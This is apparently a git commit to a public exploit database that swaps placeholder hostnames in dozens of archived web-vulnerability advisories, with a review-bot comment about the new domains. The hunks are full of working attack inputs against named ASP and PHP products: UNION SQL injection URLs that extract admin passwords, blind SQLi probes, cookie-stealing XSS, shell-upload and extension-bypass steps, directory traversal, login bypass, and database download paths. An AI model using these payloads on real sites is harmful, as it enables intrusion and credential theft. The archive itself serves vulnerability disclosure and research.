DB: 2016-09-03

Offensive Security 2016-09-03 13:13:25 +00:00
parent 31a21bb68d
commit 5e2fc10125
8946 changed files with 11253 additions and 11105 deletions


@ -74,7 +74,7 @@ if len(sys.argv) < 3:
print " "
print ' usage: %s http://server/path/ day-mounth-year' % os.path.basename(sys.argv[0])
print ' usage: %s http://server.com/path/ day-mounth-year' % os.path.basename(sys.argv[0])
print " "
@ -88,7 +88,7 @@ if len(sys.argv) < 3:
print "_______________________________________________________________"
sys.exit("\nexample: http://server/ 16-10-2010")
sys.exit("\nexample: http://www.server.com/ 16-10-2010")
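Review bot: The usage and example strings on what appears to be the new side of both hunks name `server.com` and `www.server.com`, which are registrable domains rather than reserved placeholders, so a reader who pastes the example verbatim sends requests to an unrelated third party. A name reserved by RFC 2606 keeps the example inert, e.g. `sys.exit("\nexample: http://example.com/ 16-10-2010")` with the matching change in the usage line. The same concern applies to the `site.com`, `target.com` and `Site.Com` replacements in the other file sections of this commit. The enclosing `if len(sys.argv) < 3:` block starts before the first hunk and is not closed inside either hunk.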


@ -14,15 +14,15 @@ and no any filter for html code at robots.lib.php. you can inject your html code
html inj.:
server/robotstats/admin/robots.php?rub=ajouter&nom=<font color=red size=10><body bgcolor=black>NiCKNAME(orwriteyourindexcode)&actif=1&user_agent=writeanything(orhtmlcode)&ip1=&ip2=&detection=detection_user_agent&descr_fr=&descr_en=&url=
target.com/robotstats/admin/robots.php?rub=ajouter&nom=<font color=red size=10><body bgcolor=black>NiCKNAME(orwriteyourindexcode)&actif=1&user_agent=writeanything(orhtmlcode)&ip1=&ip2=&detection=detection_user_agent&descr_fr=&descr_en=&url=
after you go here:
server/robotstats/info-robot.php?robot=(robot id)
target.com/robotstats/info-robot.php?robot=(robot id)
or
server/robotstats/admin/robots.php you will see your html page
target.com/robotstats/admin/robots.php you will see your html page
analysis: (/admin/robots.php)


@ -12,7 +12,7 @@
[~] 1.Save code html format
[~] 2.Search server
[~] 2.Search Target.com
[~] 3.Edit and replace & Target
@ -26,7 +26,7 @@
[~] 8.Formats can be uploaded (Html.Htm.Jpg.gif.Xml....)
[~] 9.server/images/uploads/File/File Name
[~] 9.Target.com/images/uploads/File/File Name
[~]######################################### ExploiT
#############################################[~]
@ -62,7 +62,7 @@ Connector:<br />
<option value="lasso/connector.lasso">Lasso</option>
<option value="perl/connector.cgi">Perl</option>
<option value="
http://server/includes/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php
http://Target.com/includes/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php
">PHP</option>
<option value="py/connector.py">Python</option>
</select>


@ -30,7 +30,7 @@ if (@ARGV < 2)
print " 2 ==> Version 1.36, 2.0 and Next\n";
print "==========================================\n\n";
print "Example:\n\n";
print " Max.pl www.server 1\n";
print " Max.pl www.Site.com 1\n";
exit();
}
$hell = "foo' or M_Name='admin";


@ -7,7 +7,7 @@ Alphast , IHS Team , Shabgard Security Team , Emperor Hacking TEam
----------------Discovered by: s d <irsdl@yahoo.com>------------------------------------------
*/
# Config ________________________________
# address - example: http://www.server/password.asp
# address - example: http://www.site.com/password.asp
$url = "http://www.mohamad.com/password.asp";
$mh = "s1";
# if webmaxportal version is : Version 1.35 and older please input $mh= "s1"


@ -15,7 +15,7 @@
[*] Err0r C0N50L3:
[*] server/player.asp?player_id={EV!L BL!ND INJ}
[*] www.target.com/player.asp?player_id={EV!L BL!ND INJ}
[*] EV!L BL!ND


@ -15,7 +15,7 @@
[*] Err0r C0N50L3:
[*] server/[path]/admin/edit.asp?ID={EV!L blind sql}
[*] www.target.com/[path]/admin/edit.asp?ID={EV!L blind sql}
[*] EV!L BL!ND sql


@ -15,7 +15,7 @@
[*] Err0r C0N50L3:
[*] server/[path]/campaignEdit.asp?CCam={EV!L blind sql}
[*] www.target.com/[path]/campaignEdit.asp?CCam={EV!L blind sql}
[*] EV!L BL!ND sql


@ -24,7 +24,7 @@ if (@ARGV < 1)
print " Usage:ASPNuke.pl <T4rg3t> \n\n";
print "==========================================\n\n";
print "Examples:\n\n";
print " ASPNuke.pl www.server \n";
print " ASPNuke.pl www.Site.com \n";
exit();
}


@ -26,7 +26,7 @@
[ª]dem0:
http://www.server/?page=details&newsID=1905+union+select+1,pword,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+users
http://www.site.com/?page=details&newsID=1905+union+select+1,pword,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+users
Admin:[Path]/admin/login.asp


@ -8,5 +8,5 @@
# Risk: Medium
#################################################################
# Vulnerability:
# http://server/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =./..
# http://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =./..
#################################################################


@ -8,7 +8,7 @@ Vulnerability:
=======================
Arbitrary File Upload
=======================
<form action = "http://server/manage/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye 'union select S_ID, S_Name, S_Dir, S_CSS, [S_UploadDir]% 2b' / .. / db ', S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_ImageExt]% 2b' | asa ', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, S_DetectFromWord, S_InitMode, S_BaseUrl from ewebeditor_style where s_name =' standard 'and'a' = 'a "method = post name = myform enctype =" multipart / form-data ">
<form action = "http://site.com/manage/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye 'union select S_ID, S_Name, S_Dir, S_CSS, [S_UploadDir]% 2b' / .. / db ', S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_ImageExt]% 2b' | asa ', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, S_DetectFromWord, S_InitMode, S_BaseUrl from ewebeditor_style where s_name =' standard 'and'a' = 'a "method = post name = myform enctype =" multipart / form-data ">
<p align="center">
<input type=file name=uploadfile size=100><br> <br>
<input type=submit value=Upload>  </p>
@ -18,19 +18,19 @@ Arbitrary File Upload
=======================
Arbitrary File Upload 2
=======================
http://server/admin/ewebeditor/ewebeditor.htm?id=body&style=popup
http://site.com/admin/ewebeditor/ewebeditor.htm?id=body&style=popup
=======================
Database Disclosure
=======================
http://server/ewebeditor/db/ewebeditor.mdb
http://site.com/ewebeditor/db/ewebeditor.mdb
=======================
Administrator bypass
=======================
http://server/eWebEditor/admin/login.asp
http://site.com/eWebEditor/admin/login.asp
put this code instead URL
javascript: alert (document.cookie = "adminpass =" + escape ( "admin"));
@ -39,11 +39,11 @@ javascript: alert (document.cookie = "adminpass =" + escape ( "admin"));
=======================
Directory Traversal
=======================
http://server/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=./..
http://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=./..
=======================
Directory Traversal 2
=======================
http://server/ewebeditor/asp/browse.asp?style=standard650&dir=./..
http://site.com/ewebeditor/asp/browse.asp?style=standard650&dir=./..


@ -22,7 +22,7 @@ Xploit: SQLi Vulnerability
DEMO URL:
http://server/new_reply_form.asp?TID=[SQLi]
http://site.com/new_reply_form.asp?TID=[SQLi]
###############################################################################################################


@ -22,7 +22,7 @@ Xploit: SQLi Vulnerability
DEMO URL:
http://server/reallusiontv/ic/productdemo.asp?page=[SQLi]
http://site.com/reallusiontv/ic/productdemo.asp?page=[SQLi]
###############################################################################################################


@ -42,7 +42,7 @@ Admin Control:
Usename:admin
Password:admin
DEMO URL :http://server/onlinenotebookmanager.asp?ItemID=[SQLi]
DEMO URL :http://site.com/onlinenotebookmanager.asp?ItemID=[SQLi]
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


@ -18,7 +18,7 @@
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=1
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title:Smart ASP Survey SQL & XSS Vulnerable
Vendor url:http://www.sellatserver
Vendor url:http://www.sellatsite.com
Version:n/a
Published: 2010-06-15
Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue, S1ayer,d3c0d3r,KD and to


@ -19,7 +19,7 @@
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title:SAS Hotel Management System SQL Vulnerable
Vendor url:http://www.sellatserver
Vendor url:http://www.sellatsite.com
Version:n/a
Price:28$
Published: 2010-06-15


@ -17,9 +17,9 @@
---
http://www.server/sablonlar/gunaysoft/gunaysoft.php?uzanti=[shell]
http://www.server/sablonlar/gunaysoft/gunaysoft.php?sayfaid=[shell]
http://www.server/sablonlar/gunaysoft/gunaysoft.php?uzanti=[shell]
http://www.site.com/sablonlar/gunaysoft/gunaysoft.php?uzanti=[shell]
http://www.site.com/sablonlar/gunaysoft/gunaysoft.php?sayfaid=[shell]
http://www.site.com/sablonlar/gunaysoft/gunaysoft.php?uzanti=[shell]
---
@ -100,7 +100,7 @@ print q
Usage:
perl phportal.pl <Target website> <Shell Location> <CMD Variable> <-r> <-p>
<Target Website> - Path to target eg: www.victim.com
<Shell Location> - Path to shell eg: http://server/r57.txt?
<Shell Location> - Path to shell eg: http://site.com/r57.txt?
<CMD Variable> - Shell command variable name eg: Pwd
<r> - Show output from shell
<p> - sablonlar/gunaysoft/gunaysoft.php


@ -12,7 +12,7 @@ if (@ARGV < 3)
print q(
+++++++++++++++++++++++++++++++++++++++++++++++++++
Usage: perl mini-nuke.pl [site] [dir] [useId] [proxy (optional)]
i.e. perl mini-nuke.pl "someserver" / 52 127.0.0.1:3128
i.e. perl mini-nuke.pl "somesite.com" / 52 127.0.0.1:3128
++++++++++++++++++++++++++++++++++++++++++++++++++++
);
exit;


@ -27,11 +27,11 @@ i-Gallery is a complete online photo gallery. Easy to navigate thumbnails with p
#######################################################################################################
Xploit :Arbitrary File Include Vulnerabilty
DEMO URL http://www.server/igallery34/viewphoto.asp?i=[file include]&f=fghd&sh=27768&sw=1024
DEMO URL http://www.site.com/igallery34/viewphoto.asp?i=[file include]&f=fghd&sh=27768&sw=1024
Xploit :Persistent XSS Vulnerabilty
DEMO URL http://www.server/igallery34/submitphotos.asp?mi=1
DEMO URL http://www.site.com/igallery34/submitphotos.asp?mi=1


@ -11,11 +11,11 @@ Dork : inurl:hikaye.asp?id=
===================================================
[+] Vulnerable File : http://www.server/hikaye.asp?id=123
[+] Vulnerable File : http://www.site.com/hikaye.asp?id=123
===================================================
[+] Demo : http://www.server/hikaye.asp?id=17'a
[+] Demo : http://www.site.com/hikaye.asp?id=17'a
===================================================


@ -11,11 +11,11 @@ Dork : inurl:makaledetay.asp?id=
===================================================
[+] Vulnerable File : http://www.server/makaledetay.asp?id=123
[+] Vulnerable File : http://www.site.com/makaledetay.asp?id=123
===================================================
[+] Demo : http://www.server/makaledetay.asp?id=15%27a
[+] Demo : http://www.site.com/makaledetay.asp?id=15%27a
===================================================


@ -13,14 +13,14 @@ Dork : :/ sorry
[+] Vulnerable File :
http://www.server/default.asp?islem=devami&id=38%20union+select+all+0,
http://www.site.com/default.asp?islem=devami&id=38%20union+select+all+0,
sifre,2,3%20,4,5+from+aky_ayarlar
===================================================
[+] Demo :
http://www.server/blog/default.asp?islem=devami&id=38%20union+s
http://www.site.com/blog/default.asp?islem=devami&id=38%20union+s
elect+all+0,sifre,2,3%20,4,5+from+aky_ayarlar
===================================================


@ -15,7 +15,7 @@
# Version: netStartEnterprise v4.0
# Path: http://www.server/previeweventdetail.aspx?id=[SQL]
# Path: http://www.site.com/previeweventdetail.aspx?id=[SQL]
# Platform: ASP


@ -84,7 +84,7 @@ sub usage()
{
head();
print " Usage: Thaisql.pl <Site> \r\n\n";
print " <Site> - Full path to Guestbook e.g. http://www.server/guestbook/ \r\n";
print " <Site> - Full path to Guestbook e.g. http://www.site.com/guestbook/ \r\n";
print "=======================================================================\r\n";
print " -=Coded by Zodiac, Bug Found by MurderSkillz=-\r\n";
print "www.exploitercode.com www.g00ns.net irc.g00ns.net #g00ns\r\n";


@ -11,7 +11,7 @@ Vulnerability : (Auth Bypass) SQL Injection Vulnerability
[Auth Bypass]:
user: pouya
pass: ' or '
admin page : http://server/[path]/admin.asp
admin page : http://site.com/[path]/admin.asp
---------------------------------
Victem :
http://www.etoshop.com/demo/pcstore


@ -123,3 +123,4 @@ Persistent XSS Vulnerabilities:
===========================================================================================


@ -43,7 +43,7 @@ Step 1) Login into member or User Section
Link:
http://www.server/dmxreadyv2/membersareamanager/membersareamanager.asp?show=login-member
http://www.site.com/dmxreadyv2/membersareamanager/membersareamanager.asp?show=login-member
Step 2) Go to Edit profile
@ -66,7 +66,7 @@ Step 3) Enter your Attack Pattern
Step 4) Refresh and View User profile
Demo Url:-
http://www.server/dmxreadyv2/membersareamanager/membersareamanager.asp?member=&show=member-profile&tab=meta
http://www.site.com/dmxreadyv2/membersareamanager/membersareamanager.asp?member=&show=member-profile&tab=meta
~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~


@ -38,7 +38,7 @@ Vulnerability:
DEMO URL:
http://www.server/detail.asp?ad_ID=1&vehicletypeID=[sqli]
http://www.site.com/detail.asp?ad_ID=1&vehicletypeID=[sqli]
# 0day n0 m0re #


@ -45,7 +45,7 @@ if id<>"" then
lots of files those will have to do input validation from user input are vulnerable to SQL Injection .
PoC :
www.server/main_fa.asp?status=news&newsID=23'/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/dc_admin/*
www.site.com/main_fa.asp?status=news&newsID=23'/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/dc_admin/*
note : if you can't see result you need to do it blindly
@ -53,7 +53,7 @@ note : if you can't see result you need to do it blindly
2- Bypass uploads restriction:
after you got user/pass with sql injection go to
http://server/admin/dc_upload.asp
http://site.com/admin/dc_upload.asp
js file line 13-34 :
@ -82,4 +82,4 @@ function showthumb(file) {
as you can see the uploader will check malicious extention by javascript . just disable javascript and you can upload "ASP" shell.
you can find your shell in : www.server/0_site_com/[rnd-number].asp (the application itself will show you right rnd number after upload)
you can find your shell in : www.site.com/0_site_com/[rnd-number].asp (the application itself will show you right rnd number after upload)


@ -65,3 +65,4 @@ PoC:
Note that : the value 2010_7_25 is the exact date of server.
===========================================================================================


@ -46,14 +46,14 @@ Description :
Considering to the code, you can browse these URLs:
http://www.server/module/article/article/article.asp?articleid=7' (the false Query will be shown)
http://www.server/module/article/article/article.asp?articleid=7+and+'a'='a'-- (this Query is always true)
http://www.site.com/module/article/article/article.asp?articleid=7' (the false Query will be shown)
http://www.site.com/module/article/article/article.asp?articleid=7+and+'a'='a'-- (this Query is always true)
with the following URL you can find the first character of Username:
http://www.server/module/article/article/article.asp?articleid=7+and+'a'=(select+SUBSTRING(Username,1,1)+from+tblUser)--
http://www.site.com/module/article/article/article.asp?articleid=7+and+'a'=(select+SUBSTRING(Username,1,1)+from+tblUser)--
and second character:
http://www.server/module/article/article/article.asp?articleid=7+and+'a'=(select+SUBSTRING(Username,2,1)+from+tblUser)--
http://www.site.com/module/article/article/article.asp?articleid=7+and+'a'=(select+SUBSTRING(Username,2,1)+from+tblUser)--
and so on.


@ -83,3 +83,4 @@ This page remove Admins Role in VWD-CMS.
===========================================================================================


@ -179,3 +179,4 @@ Persistent XSS and XSRF:
===========================================================================================


@ -183,3 +183,4 @@ This page uploads a file
===========================================================================================


@ -61,3 +61,4 @@ Persistent XSS in admin section:
===========================================================================================


@ -9,7 +9,7 @@ Gokhun ASP Stok v1.0 - Multiple Remote Vulnerabilities
~Script : Gokhun ASP Stok v1.0
~Software: http://www.gokhun.com & http://www.aspindir.com/goster/6092
~Vulnerability Style : Multiple vulnerabilities
~Demo : http://www.server/asp/pages/main/
~Demo : http://www.site.com/asp/pages/main/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~ Explotation ~~~~~~~~~~~
======== SQL Injection =========
@ -51,7 +51,7 @@ print "[-]Ornegi inceleyin\n\n";
}
sub help()
{
print "[+] usage1 : perl $0 server /path/ \n";
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}


@ -160,3 +160,4 @@ This page uploads a file with "xml" extension
</html>
===========================================================================================


@ -40,7 +40,7 @@ if len(sys.argv) < 2:
print " "
print " coded by ZoRLu "
print " "
print ' usage: %s http://server/path/' % os.path.basename(sys.argv[0])
print ' usage: %s http://server.com/path/' % os.path.basename(sys.argv[0])
print " "
print "_______________________________________________________________"
sys.exit(1)


@ -38,7 +38,7 @@ if len(sys.argv) < 2:
print " "
print " coded by ZoRLu "
print " "
print ' usage: %s http://server/path/' % os.path.basename(sys.argv[0])
print ' usage: %s http://server.com/path/' % os.path.basename(sys.argv[0])
print " "
print "_______________________________________________________________"
sys.exit(1)


@ -29,7 +29,7 @@ if len(sys.argv) < 2:
print " "
print " Usage: "
print " "
print " python exploit.py http://server/path/ "
print " python exploit.py http://site.com/path/ "
print " "
print "_______________________________________________________________"
sys.exit(1)


@ -49,7 +49,7 @@ print "[-]Ornegi inceleyin\n\n";
}
sub help()
{
print "[+] usage1 : perl $0 server /path/ \n";
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}


@ -29,7 +29,7 @@ private void Page_Load(object sender, EventArgs e)
}
[-] End Poc
[#] Exploit :
http://server/DesktopModules/Gallery/OrderForm.aspx?itemtitle=<script>alert('ITSecTeam')</script>
http://Site.Com/DesktopModules/Gallery/OrderForm.aspx?itemtitle=<script>alert('ITSecTeam')</script>
[2] Remote File Upload :
@ -41,14 +41,14 @@ string acceptedFiles =
";.jpg;.jpeg;.jpe;.gif;.bmp;.png;.swf;.avi;.ra;.mov;.mpeg;.mpg;.wav;";
You Can Bypass
[-] End Poc
[#] Exploit :http://server/DesktopModules/ftb/ftb.imagegallery.aspx[*]
[#] Exploit :http://Site.Com/DesktopModules/ftb/ftb.imagegallery.aspx[*]
[3] Information Leakage Show Device Info :
http://server/security/DeviceInfo.aspx
http://Site.Com/security/DeviceInfo.aspx
[4] Xss Present :
http://server/security/DeviceInfo.aspx
http://Site.Com/security/DeviceInfo.aspx
[~] Poc :
Douran.dll:DouranPortal.DesktopModules.BlogDB
Submit Data Without Check{
@ -104,7 +104,7 @@ SqlDbType.NVarChar, 100);
command.ExecuteNonQuery();
sqlConnectionString.Close();}
[-] End Poc
[#] Exploit :http://server/DesktopModules/Blog/BlogView.aspx
[#] Exploit :http://Site.Com/DesktopModules/Blog/BlogView.aspx
[-][-][-][-][-][-][-](Vulnerabilities)[-][-][-][-][-][-][-]
~~~~~~~~~~~~~~~~[Vulnerabilities]~~~~~~~~~~~~~~~~~~~~~~~~~~~~


@ -25,7 +25,7 @@ NewsPad Database Download Vulnerability
############################################################
exploit # server/path/database/NewsPad.mdb
exploit # www.target.com/path/database/NewsPad.mdb
############################################################


@ -17,13 +17,13 @@ Sitefinity CMS (ASP.NET) Shell Upload Vulnerability
exploit # /UserControls/Dialogs/ImageEditorDialog.aspx
first go to # http://server/sitefinity/
first go to # http://site.com/sitefinity/
then # http://server/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
then # http://site.com/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
select # asp renamed via the .asp;.jpg (shell.asp;.jpg)
Upload to # http://server/Images/[shell]
Upload to # http://site.com/Images/[shell]
Video : http://net-edit0r.persiangig.com/Film/0day.rar


@ -15,7 +15,7 @@ print "\r\n=-=-=-===============================================================
if (@ARGV != 2)
{
print " Usage: kapda_D2KBLOG_xpl.pl [Target Domain] [Vulnerable Page]\n\r\n";
print " ex: kapda_D2KBLOG_xpl.pl server /blog/profile.asp\n\r\n";
print " ex: kapda_D2KBLOG_xpl.pl www.target.com /blog/profile.asp\n\r\n";
exit ();
}


@ -36,3 +36,4 @@ Personal
# Special Thanks : Farzad_Ho,R3dMind,rAbiN_hoOd,Falcon


@ -8,7 +8,7 @@
# Found: Br0ly
# google dork: inurl:"produtos.asp?produto="
# Use some base64 decode google IT.
# After decoding login and pass go to: www.server.br/administrador.asp
# After decoding login and pass go to: www.site.com.br/administrador.asp
# aoiuaoaaaaiuahiuahaaiauhaiuha EASY ???
# BRASIL!! :D
#


@ -6,11 +6,11 @@ dork : intext:"powered by DiyWeb"
SQL - Microsoft JET Database Engine error
-----------------------------------------
http://server/template.asp?menuid=[SQL]
http://server/viewcatalog.asp?id=[SQL]
http://server/xxx.asp?id=[SQL]
http://site.com/template.asp?menuid=[SQL]
http://site.com/viewcatalog.asp?id=[SQL]
http://site.com/xxx.asp?id=[SQL]
XSS
---
http://server/diyweb/login.asp?msg=[XSS] -- login page
http://site.com/diyweb/login.asp?msg=[XSS] -- login page


@ -8,21 +8,21 @@ Blind SQL
POC
---
http://server//gallery_details.asp?a_id=12' and '1'='1 TRUE
http://server//gallery_details.asp?a_id=12' and '0'='1 FALSE
http://site.com//gallery_details.asp?a_id=12' and '1'='1 TRUE
http://site.com//gallery_details.asp?a_id=12' and '0'='1 FALSE
2 - Parameter news.asp?intSeq=[Blind SQL]
POC
---
http://www.server/news/news.asp?intSeq=69' and '1'='1 TRUE
http://www.server/news/news.asp?intSeq=69' and '0'='1 FALSE
http://www.site.com/news/news.asp?intSeq=69' and '1'='1 TRUE
http://www.site.com/news/news.asp?intSeq=69' and '0'='1 FALSE
3 - Parameter news.asp?id=[Blind SQL]
POC
---
http://www.server/news/news.asp?id=256 and 1=1 TRUE
http://www.server/news/news.asp?id=256 and 1=0 FALSE
http://www.site.com/news/news.asp?id=256 and 1=1 TRUE
http://www.site.com/news/news.asp?id=256 and 1=0 FALSE


@ -8,13 +8,13 @@ SQL - Microsoft JET Database Engine error
------------------------------------------
view_article.asp?item=[SQL]
http://server/page.asp?pID=[SQL]
http://server/display.asp?sortby=sections&sID=[SQL]
http://site.com/page.asp?pID=[SQL]
http://site.com/display.asp?sortby=sections&sID=[SQL]
POC
---
http://server/view_article.asp?item=1 union select 1 from test.a
http://site.com/view_article.asp?item=1 union select 1 from test.a
thanks,
-p0pc0rn-


@ -5,10 +5,10 @@ Found by: p0pc0rn
SQL
---
http://server/page.asp?id=[SQL]
http://server/cat.asp?catid=[SQL]
http://server/catin.asp?productid=[SQL]
http://site.com/page.asp?id=[SQL]
http://site.com/cat.asp?catid=[SQL]
http://site.com/catin.asp?productid=[SQL]
POC
---
http://server/page.asp?id=23 union select 1 from test.a
http://site.com/page.asp?id=23 union select 1 from test.a


@ -6,7 +6,7 @@
# Software: Element-IT PowUpload 1.3
# Software Link: http://www.element-it.com/downloadfile.aspx?type=pow
# Demo:
http://server/Examples/PowUpload/Simpleupload.htm
http://site.com/Examples/PowUpload/Simpleupload.htm
 
[Comment]
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Inyexion,


@ -5,7 +5,7 @@
# Author Web: www.delincuentedigital.com.ar
# Software: EAFlashUpload v 2.5
# Software Link: http://www.easyalgo.com/downloads.aspx#EAFlashUpload
# Demo: http://www.server/examples/eaflashupload/simpleupload.aspx
# Demo: http://www.site.com/examples/eaflashupload/simpleupload.aspx
 
[Comment]
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Inyexion,


@ -28,10 +28,10 @@
#
#
#
# [+]http://server/default.asp?pid=524'
# [+]http://server/default.asp?pid=[SQLi]
# [+]http://server/viewproduct.asp?PID=130'
# [+]http://server/viewproduct.asp?PID=[SQli]
# [+]http://site.com/default.asp?pid=524'
# [+]http://site.com/default.asp?pid=[SQLi]
# [+]http://site.com/viewproduct.asp?PID=130'
# [+]http://site.com/viewproduct.asp?PID=[SQli]
#
#
# => PROUD TO BE AN INDIAN | Anythning for INDIA | JAI-HIND | Maa Tujhe Salam


@ -6,7 +6,7 @@
First you must be logged in
Then type this in your browser
http://www.server/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1
http://www.site.com/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1
You will find admin's password


@ -12,7 +12,7 @@ Exploit Details :
2- Browse This Link : /forum/pm_show_message.asp?ID= "it's a message on Your Inbox"
3- Poc: www.server//forum/pm_show_message.asp?ID=(inject here)
3- Poc: www.site.com//forum/pm_show_message.asp?ID=(inject here)
----------------------------------------------------------------
****** SSMM T34M ******


@ -11,8 +11,8 @@ Successful exploitation extracts username and password of administrator in clear
Proof of Concepts:
--------------------
server/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1'
server/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1'
site.com/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1'
site.com/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1'
-------


@ -236,8 +236,8 @@ $hello='
Website : www.kami.ma
Usage> php knowledgebase0day.php host
Exemple> php knowledgebase0day.php kbase.server
Exemple> php knowledgebase0day.php kbase.server /foo
Exemple> php knowledgebase0day.php kbase.target.com
Exemple> php knowledgebase0day.php kbase.target.com /foo
';


@ -5,4 +5,4 @@ Hosting Controller is an application which consolidates all hosting tasks into o
The DSNManager script does not sufficiently filter dot-dot-slash (../) sequences from URL parameters, making it prone to directory traversal attacks. An attacker can exploit this condition to disclose the contents of arbitrary web-readable files or potentially add a DSN (Data Source Number) to an arbitrary directory.
http://target/admin/dsn/dsnmanager.asp?DSNAction=ChangeRoot&RootName=D:\webspace\opendnsserver\targ
et\server\db\..\..\..\..\
et\target.com\db\..\..\..\..\


@ -17,11 +17,11 @@
################################################################################
############################################################################################################################################################
#Usage : http://server/path/comments.asp?id=-1 UNION SELECT ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null FROM T_USERS WHERE id=1 #
#Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null FROM T_USERS WHERE id=1 #
############################################################################################################################################################
###########################################################
#Admin Panel : http://server/path/admin/login.asp #
#Admin Panel : http://www.target.com/path/admin/login.asp #
###########################################################
# milw0rm.com [2006-08-20]


@ -17,11 +17,11 @@
################################################################################
###################################################################################################################
#Usage : http://server/path/comments.asp?id=-1 UNION SELECT 0,username,password,3,4+FROM+LOGIN+WHERE+ID=1 #
#Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT 0,username,password,3,4+FROM+LOGIN+WHERE+ID=1 #
###################################################################################################################
#################################################
#Admin Panel : http://server/path/admin #
#Admin Panel : http://www.target.com/path/admin #
#################################################
# milw0rm.com [2006-08-20]


@ -17,6 +17,6 @@ Cookie: philboard_admin=True;
Download the database (users and password):
Usually, the database location can be found and download it from:
http://server/database/philboard.mdb
http://www.target.com/database/philboard.mdb
or
http://server/forum/database/philboard.mdb
http://www.target.com/forum/database/philboard.mdb


@ -4,8 +4,8 @@ A cross-site scripting vulnerability has been reported for ProductCart. The vuln
Exploitation could permit an attacker to steal cookie-based authentication credentials or launch other attacks.
http://www.webserver/ProductCart/pc/msg.asp?message=><script>alert
http://www.website.com/ProductCart/pc/msg.asp?message=><script>alert
(document.cookie);</script>
http://www.webserver/ProductCart/pc/msg.asp?message=<iframe%20src="C:\"%
http://www.website.com/ProductCart/pc/msg.asp?message=<iframe%20src="C:\"%
20width=400%20height=400></iframe>


@ -9,11 +9,11 @@
################################################################################
##########################################################################################################################################################################
#Usage : http://server/path/devam.asp?YID=-1 UNION SELECT null,null,null,null,null,editor_adi,null,editor_sifre,editor_mail,null FROM editor WHERE editor_id = 1 #
#Usage : http://www.target.com/path/devam.asp?YID=-1 UNION SELECT null,null,null,null,null,editor_adi,null,editor_sifre,editor_mail,null FROM editor WHERE editor_id = 1 #
##########################################################################################################################################################################
#############################################################
#Admin Panel : http://server/path/admin/default.asp #
#Admin Panel : http://www.target.com/path/admin/default.asp #
#############################################################
# milw0rm.com [2006-09-01]


@ -9,7 +9,7 @@
#Price of Portal: 300YTL // Good money for Bad Script
#Exploit :
www.server /[portal path]/kategori.asp?kat=-1%20union%20select%200,U_ADI,2,U_SIFRE,4,5,6,7,8,9,10,11,12,13,14%20from%20uyeler%20where%20U_ID%20like%201
www.site.com /[portal path]/kategori.asp?kat=-1%20union%20select%200,U_ADI,2,U_SIFRE,4,5,6,7,8,9,10,11,12,13,14%20from%20uyeler%20where%20U_ID%20like%201
#BURCU Seni hep sevdim hep sevicem.


@ -9,15 +9,15 @@
